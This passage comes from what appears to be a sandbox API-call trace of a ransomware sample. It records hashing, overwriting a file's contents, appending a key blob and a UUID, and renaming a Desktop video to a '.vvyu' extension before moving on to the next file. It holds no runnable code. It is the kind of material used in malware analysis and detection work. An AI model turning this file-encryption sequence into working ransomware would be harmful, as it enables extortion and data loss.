phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0192.274] CryptHashData (hHash=0x2a05e28, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.274] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0192.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0192.275] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0192.275] GetLastError () returned 0x0 [0192.275] CryptDestroyHash (hHash=0x2a05e28) returned 1 [0192.275] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0192.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.275] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0192.275] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0192.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.275] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0192.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc30) returned 0x2af5168 [0192.276] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0192.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0192.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0192.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0192.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6110 [0192.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b40 [0192.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6128 [0192.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6158 [0192.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61b8 [0192.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6170 [0192.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0192.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0192.276] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0192.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0192.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0192.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0192.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61b8 [0192.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0192.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6170 [0192.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0192.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6158 [0192.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0192.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0192.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0192.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0192.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0192.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0192.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0192.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0192.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0192.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0192.279] GetCurrentThreadId () returned 0x5d8 [0192.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0192.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7188 [0192.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0192.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0192.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0192.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0192.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.280] GetCurrentThreadId () returned 0x5d8 [0192.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0192.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0192.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0192.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0192.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61b8 [0192.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0192.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0192.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0192.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6158 [0192.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0192.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0192.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0192.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0192.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6170 [0192.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0192.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0192.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0192.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6140 [0192.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0192.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61d0 [0192.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0192.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61a0 [0192.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6188 [0192.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61e8 [0192.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6188 [0192.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0192.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0192.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0192.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0192.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6158 [0192.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0192.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0192.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0192.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0192.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0192.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0192.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0192.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0192.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0192.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0192.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0192.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0192.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0192.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0192.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0192.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0192.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0192.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0192.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0192.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b40 | out: hHeap=0x2c0000) returned 1 [0192.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0192.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0192.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0192.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0192.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0192.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.292] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xfc2c, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xfc2c, lpOverlapped=0x0) returned 1 [0192.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0192.294] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xfc31, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.294] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0192.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0192.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0192.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0192.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0192.295] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.296] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.296] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.296] CloseHandle (hObject=0x584) returned 1 [0192.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0192.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0192.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0192.299] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\bp67ry2E oYq1FPgm.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\bp67ry2e oyq1fpgm.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\bp67ry2E oYq1FPgm.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\bp67ry2e oyq1fpgm.mp4.vvyu")) returned 1 [0192.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.301] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.304] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ee7d40, ftCreationTime.dwHighDateTime=0x1d89c4c, ftLastAccessTime.dwLowDateTime=0xad51b1d0, ftLastAccessTime.dwHighDateTime=0x1d8a626, ftLastWriteTime.dwLowDateTime=0xad51b1d0, ftLastWriteTime.dwHighDateTime=0x1d8a626, nFileSizeHigh=0x0, nFileSizeLow=0x16b02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hAK2yhq7O.jpg", cAlternateFileName="HAK2YH~1.JPG")) returned 1 [0192.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x345758 [0192.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.304] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\hAK2yhq7O.jpg") returned=".jpg" [0192.304] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\hAK2yhq7O.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\hak2yhq7o.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.319] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=92930) returned 1 [0192.319] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0192.322] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16adc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.322] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.324] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.324] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x16b02, lpOverlapped=0x0) returned 1 [0192.325] lstrlenA (lpString="-----BEGIN PUBLIC 